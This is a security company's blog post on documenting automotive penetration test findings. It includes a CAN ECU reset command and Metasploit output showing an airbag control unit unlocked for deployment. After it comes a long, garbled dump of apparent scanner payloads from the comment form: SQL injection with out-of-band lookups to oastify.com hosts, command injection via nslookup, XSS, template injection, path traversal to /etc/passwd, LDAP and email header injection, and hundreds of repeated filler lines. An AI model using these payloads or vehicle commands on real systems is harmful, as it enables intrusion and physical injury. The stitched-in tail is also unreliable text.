Are you a car hacker and at the same time a penetration tester? Will then, you must be if you have stumbled upon this article. If not, I guess you are preparing to be one.
At Nullforge, we pride ourselves in an automated penetration test report so as not to give hassle to our clients and to our very own penetration testers. Yes we have our own tracker and we want to share how to write a good documentation in one of your findings especially if it is related to car hacking and automotive security.
The first thing to note when writing a penetration test report for an automotive client wherein the targets are the vehicles or cars, you need to treat the report the same as how you create a network or a web app penetration testing report.
To create a report that has an edge and so that the clients will not forget your company, you need to document the replication steps as easy as possible to follow. Always include a proof of concept. For Example:
1. Connect your hardware to the sensor that has two twisted wires (CAN Hi and CAN Low)
2. Execute the following command to send an ECU hard reset:
cansend can0 7DF#0211010000000000
It should be clear and concise. An impact should also be highlighted if possible before the replication steps.
Since there is no secret at all because it is just like creating a normal pentest report, we will focus on how to create or document one finding as an example. Here is a sample documentation (this is just a sample):
Vulnerability Details
Vulnerability: Vehicle Authentication Mechanism Bypass or Gateway Bypass
CVSS: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
Description: Injecting UDS messages that result in vehicle manipulation, ECU Reset or getting the gateway to pass a message is a security issue. Sending UDS Requests via regular OBD socket or interface should be protected and filtered by the gateway.
Corrective Actions: Implement a security gateway that filters disallowed or malicious frames. Cross correlate and validate sensor values across multiple sensors that can improve the data integrity of CAN bus messages. The order of the messages from a single Electronic Control Unit (ECU) can be used to detect anomalies. CAN messages from the ECU should always be seen in a specific order as they are transmitted one after the other based on the priorities of messages.
Replication Steps
The airbag detonation algorithm allows injury to passenger-car occupants via predictable Security Access (SA) data to the internal CAN bus (or the OBD connector). It has been found that through the OBD-II port, you can send can frames to deploy airbags which should be filtered or not allowed in the OBD. Here is a successful unlock and prepped-to-deploy of pyrotechnic devices in a target vehicle using msf’s Pyrotechnical Device Deployment Tool (PDT) post module:
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.
msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run
[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true} Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...
hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=can0
[*] Gathering Data...
[*] VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*] 69 | battery clamp main battery
[*] | Deployment Status: Fail ()
[*] Number of PCUs in vehicle | 1
[*] Info About First PCU
[*] Address format this PCU(s) | 11 bit normal addressing
[*] Number of pyrotechnic charges | 1
[*] Version of ISO26021 standard | 1
[*] ACL type | CAN only
[*] ACL Type version | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success. Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
References:
https://www.cvedetails.com/cve/CVE-2017-14937/
https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
And so there it is, for the replication steps: always make sure to point out where the attack surface is and what tools were used to create a proof of concept.
This is not only applicable for a pentest report but also when writing a good report for a bug bounty program. It is easy for the triager to replicate your findings if your report is detailed, easy, has a proof of concept and an impact.
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %vmxrp;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %vmxrp;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\4ditxmyb3qkmq9gkb00gojr3euklbbzcs0jq7iu8ix.oasti’+’fy.com\glq’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\i2l7m0nps490fn5y0epudxgh389z0poqhe85wxjn7c.oasti’+’fy.com\kkg’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\1z1qjjk8pn6jc62hxxmdagd00r6ix8l9ex5pthg74w.oasti’+’fy.com\ehp’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\gvf5fygnl22y8lywtcis6v9fw62xtnhoac15pxcn0c.oasti’+’fy.com\dlg’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\rtogd9eyjd096ww7rng3467quh08ryfz8nzpnha7yw.oastify.com\\fhq’))
COMMENT *’+(select load_file(‘\\\\m3qbn4ott8a4gr621iqye1hl4ca31tpuii9lxdk38s.oastify.com\\uxh’))+’
COMMENT *’
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %jlgdw;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jlgdw;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\xrsy32du9tw8zgj7yy2gvy9jbah85ztqjeb11pq.oasti’+’fy.com\ypj’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\2kn3w76z2ypdslccr3vlo32o4fady4mvdj56vuk.oasti’+’fy.com\ccy’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\9y8aaek6g53k6sqj5a9s2agvimokcb02sqkda1z.oasti’+’fy.com\prv’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\k7sljpthpgcvf3zueli3blp6rxxvlm9d21uokc9.oasti’+’fy.com\xeq’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\qsmr4venamx109k0zr39wracc3i16sujw7ouei3.oastify.com\\qas’))
COMMENT *’+(select load_file(‘\\\\p2sqeuomkl70a8uz9qd86qkbm2s0gr4i76ztphe.oastify.com\\lmh’))+’
COMMENT *’
(select*from(select(sleep(20)))a)
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *+(select*from(select(sleep(20)))a)+
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT * and (select*from(select(sleep(20)))a)–
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT * waitfor delay’0:0:20′–
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *)waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *,0)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *||pg_sleep(20)–
COMMENT *’||pg_sleep(20)–
COMMENT * AND pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *,”||pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *)AND pg_sleep(20)–
COMMENT *’)AND pg_sleep(20)–
COMMENT *,0)AND pg_sleep(20)–
COMMENT *’,0)AND pg_sleep(20)–
COMMENT *60086625′ or ‘5426’=’5426
COMMENT *59785867′ or ‘6185’=’6191
COMMENT *85092578′ or ‘2568’=’2568
COMMENT *20967736′ or ‘3513’=’3513′
COMMENT *34808815′ or 7753=7753–
COMMENT *69249851′ or 3325=3329–
COMMENT *52338550′ or 6204=6204–
COMMENT *43598332′ or 6224=6224′–
COMMENT *’ and ‘3114’=’3114
COMMENT *’ and ‘2795’=’2803
COMMENT *’ and ‘7542’=’7542
COMMENT *’ and ‘3007’=’3007′
COMMENT *’ and 7903=7903–
COMMENT *’ and 3233=3240–
COMMENT *’ and 5447=5447–
COMMENT *’ and 9163=9163′–
COMMENT *”
i9ld853chz
COMMENT *tnk4zz22ve
COMMENT *alert(1)
COMMENT *gjevvjxfw5
COMMENT *v38ayalert(1)l0apx
COMMENT *v38ayalert(1)l0apx
COMMENT *v38ay%3cscript%3ealert%281%29%3c%2fscript%3el0apx
COMMENT *v38ayalert(1)l0apx
COMMENT *r80rcalert(1)v0cau
COMMENT *r80rcalert(1)v0cau
COMMENT *r80rc%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ev0cau
COMMENT *r80rcalert(1)v0cau
COMMENT *aj651pfkje
COMMENT *aj651pfkje
COMMENT *aj651%3ca%20b%3dc%3epfkje
COMMENT *aj651pfkje
vvinr${117*673}fgu7j
hc3r0{{999*631}}nmkww
saqu2#{814*803}vjllm
p7kp4[[198*558]]c7cs3
l5yes${file.separator}ucwiy
npdg2%{745*276}g0q0q
enuew{{105|add:890}}x6on0
#set ($a=261*857) rzqtc${a}q2k37
eiyuun62to
haosw
= 863*758
se698{{.}}yeymx{{..}}rf0cw
apfpa__${627*888}__ugeph
COMMENT *}}nmaco’/”<evhm3
COMMENT *%}ggvxk’/”<ebwfr
COMMENT *j86bq%>kwdxe’/”<vb7y2
COMMENT *’+sleep(20.to_i)+’
COMMENT *’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))
COMMENT *’.sleep(20).’
COMMENT *{${sleep(20)}}
mp5u9m1lxg7pts0omugi
w5ygpu7vnr%416p5rwztvv5
839aw29i7g\\l6xnb3mjd1
z894ict3ckAc83k994dvv
z894ict3ckAc83k994dvv
COMMENT *pp97fpc8saiksh6k78g1
COMMENT *9wm1zsn2cv%41euwf4w0v3l
COMMENT *1pv2k57asu\\lx7ukmtwhc
COMMENT *0eyhbwjiusAeflshxwtva
COMMENT *0eyhbwjiusAeflshxwtva
k8tlkpuhqgdvg30uflj3clq6sxyvmmaey6lw9l.oastify.com
http://ik6jwn6f2epts1csrjv1oj244vatykmaa2xslh.oastify.com?COMMENT *
nslookup -q=cname 1wy286iyex1c4kob327k02engemca3yw1kt7jv8.oastify.com.&
COMMENT *|nslookup -q=cname t4yugyqqmp94ccw3bufc8umfo6u4iv6rujh95y.oastify.com.&
COMMENT *'”`0&nslookup -q=cname n5tohsrknjayd6xxcog69on9p0vyjp7mvei46t.oastify.com.&`’
COMMENT *&nslookup -q=cname q2trevonkm71a9u09rd96rkcm3s1gs4nsff53u.oastify.com.&’\”`0&nslookup -q=cname q2trevonkm71a9u09rd96rkcm3s1gs4nsff53u.oastify.com.&`’
COMMENT *|echo 1u9xczyjyn rvusqsyad9||a #’ |echo 1u9xczyjyn rvusqsyad9||a #|” |echo 1u9xczyjyn rvusqsyad9||a #
COMMENT *&echo vjdeci7lik 95ev0w75u4&
COMMENT *”|echo ywm2xay32g hbyfpaj0w8 ||
COMMENT *’|echo tyipnwzx34 x1cq0khafa #xzwx
COMMENT *|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1
COMMENT *|ping -c 21 127.0.0.1||x
COMMENT *&ping -n 21 127.0.0.1&
COMMENT *’|ping -c 21 127.0.0.1 #
COMMENT *”|ping -n 21 127.0.0.1 ||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
c:\windows\win.ini
../../../../../../../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
../../../../../../../../../../../../../../../../winnt/win.ini
\windows\win.ini
file:///c:/windows/win.ini
…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini
…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini
…\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini
windowswin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
COMMENT *../../../../../../../../../../../../../../../../windows/win.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
COMMENT *../../../../../../../../../../../../../../../../winnt/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniCOMMENT *
c:\windows\win.iniCOMMENT *
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniCOMMENT *
../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd
file:///etc/passwd
…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd
etcpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
COMMENT *../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwdCOMMENT *
…/COMMENT *
./COMMENT *
././COMMENT *
eci/COMMENT *
./wp-comments-post.php
…/wp-comments-post.php
nab/wp-comments-post.php
././wp-comments-post.php
/./wp-comments-post.php
/…/wp-comments-post.php
/wsb/wp-comments-post.php
/././wp-comments-post.php
oxis0nhgx8)(objectClass=*
4olmv2d27d)(!(objectClass=*)
so46d3qrhg)(!(!(objectClass=*))
05ak64hpwr)(!(!(!(objectClass=*)))
*)(objectClass=*
*)(!(objectClass=*)
*)(!(!(objectClass=*))
*)(!(!(!(objectClass=*)))
taa
COMMENT *]]>><
COMMENT *’+(function(){if(typeof btap1===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);btap1=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
wzv: s
COMMENT *>
BCC:[email protected]
ywg: u
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
h1jidmnejd6s90tr8ic05ij3lursfj3bvznmda2
COMMENT *
COMMENT *
gyPk OzCk PON xIXTHxYQ